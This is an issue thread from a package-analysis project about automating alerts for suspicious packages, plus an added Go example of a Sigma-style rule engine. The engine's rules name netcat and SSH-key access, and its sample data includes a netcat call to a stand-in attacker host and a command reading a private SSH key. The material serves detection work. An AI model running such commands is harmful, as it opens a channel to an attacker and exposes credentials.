
How to automate analysis of results?

Open ultramaxim opened this issue 3 years ago • 2 comments

Do you have any rules or something else to automatically alert if there is suspicious activity?

ultramaxim avatar May 11 '22 06:05 ultramaxim

Hi there!

Currently we're focused on collecting high quality raw signals and we don't have any automated rules to detect suspicious activity yet. Contributions are welcome :)

oliverchang avatar May 11 '22 06:05 oliverchang

Currently we manually query the BigQuery dataset directly using SQL to hunt for suspicious activity.

What I had in mind here is using something like Sigma rules (similar to Yara/Snort rules) to match against analysis results (treating them as "log entries"). A (public) PubSub topic could be used to signal that new analysis results are ready.

For example, rules could be added to match against bad domains, or commands (e.g. 'nc') could be used to flag the most obvious examples of malware.

Output could be another BigQuery table, a PubSub queue, a log, etc.

Did you have any thoughts or experience in this area?

calebbrown avatar May 11 '22 22:05 calebbrown
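As an added example of the Sigma-style matching described in the comment above (this is illustrative code written for this thread, not code from the package-analysis project): a tiny rule engine that treats each analysis result as a "log entry", applies rules whose selectors are ANDed together, and emits alerts that could be written to a BigQuery table, a Pub/Sub topic or a log. The result shape (an `Events` map keyed by `commands`, `domains`, `files`), the rule format, the `command`/`contains`/`endswith` operators and the sample packages are all assumptions constructed for the example; they are not the project's schema.

```go
package main

import (
	"fmt"
	"path"
	"strings"
)

// AnalysisResult is a constructed, simplified view of one package-analysis run; Events groups
// observed signals by kind ("commands", "domains", "files"). This shape is an assumption, not the project's schema.
type AnalysisResult struct {
	Package, Version string
	Events           map[string][]string
}
// Selector fires when any value of Events[Field] matches any pattern; Op is "command" (executable basename), "contains" or "endswith".
type Selector struct {
	Field, Op string
	Patterns  []string
}
// Rule is a minimal Sigma-style rule: it fires only when every selector matches (AND).
type Rule struct {
	Title, Level string
	Selection    []Selector
}
type Alert struct{ Package, Version, Rule, Level string }

func matchOne(op, value, pattern string) bool {
	switch op {
	case "command": // "/usr/bin/nc host 4444" is compared as "nc"
		f := strings.Fields(value)
		return len(f) > 0 && path.Base(f[0]) == pattern
	case "contains":
		return strings.Contains(value, pattern)
	case "endswith":
		return strings.HasSuffix(value, pattern)
	}
	return false
}

func (s Selector) matches(r AnalysisResult) bool {
	for _, v := range r.Events[s.Field] {
		for _, p := range s.Patterns {
			if matchOne(s.Op, v, p) {
				return true
			}
		}
	}
	return false
}

func (rule Rule) Matches(r AnalysisResult) bool {
	for _, s := range rule.Selection {
		if !s.matches(r) {
			return false
		}
	}
	return len(rule.Selection) > 0 // an empty rule never fires
}

// Evaluate runs every rule over every result and collects the hits.
func Evaluate(rules []Rule, results []AnalysisResult) []Alert {
	var alerts []Alert
	for _, r := range results {
		for _, rule := range rules {
			if rule.Matches(r) {
				alerts = append(alerts, Alert{r.Package, r.Version, rule.Title, rule.Level})
			}
		}
	}
	return alerts
}

// DefaultRules are illustrative rules in the spirit of the comment above, not a real detection set.
func DefaultRules() []Rule {
	return []Rule{
		{"Netcat executed during install", "high", []Selector{
			{"commands", "command", []string{"nc", "ncat", "netcat"}}}},
		{"Known-bad domain contacted", "high", []Selector{
			{"domains", "endswith", []string{"evil.example", ".bad.example"}}}},
		{"Shell spawned and SSH key accessed", "medium", []Selector{
			{"commands", "command", []string{"sh", "bash"}},
			{"files", "contains", []string{"/.ssh/"}}}},
	}
}

// SampleResults are constructed inputs: one benign package and one suspicious one.
func SampleResults() []AnalysisResult {
	return []AnalysisResult{
		{"left-pad", "1.0.0", map[string][]string{"commands": {"node install.js"}, "domains": {"registry.npmjs.org"}, "files": {"/tmp/build.log"}}},
		{"totally-fine", "2.3.1", map[string][]string{
			"commands": {"sh -c ./postinstall.sh", "/usr/bin/nc evil.example 4444", "cat /root/.ssh/id_rsa"},
			"domains":  {"evil.example"}, "files": {"/root/.ssh/id_rsa"}}},
	}
}

func main() {
	for _, a := range Evaluate(DefaultRules(), SampleResults()) {
		fmt.Printf("[%s] %s@%s: %s\n", a.Level, a.Package, a.Version, a.Rule)
	}
}
```

Running it prints three alerts, all for `totally-fine@2.3.1`, and none for `left-pad`. Two caveats worth carrying into a real implementation: `endswith` is a coarse domain match (`notevil.example` would also hit `evil.example`, so match on DNS labels instead), and executable-name rules such as `nc` or `sh` will fire on plenty of legitimate install scripts, so alerts like these are triage signals for a human, not verdicts.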

Hi @ultramaxim!

We've started a new repo to publish data on packages that are detected as suspicious, called Malicious Packages.

Please note that the repo is still a work in progress, and there is no data yet, but it is coming :)

You are also welcome to get involved - see the repo readme for more details.

I'll close this issue for now, but feel free to open a new issue if you have further questions!

maxfisher-g avatar Jun 15 '23 01:06 maxfisher-g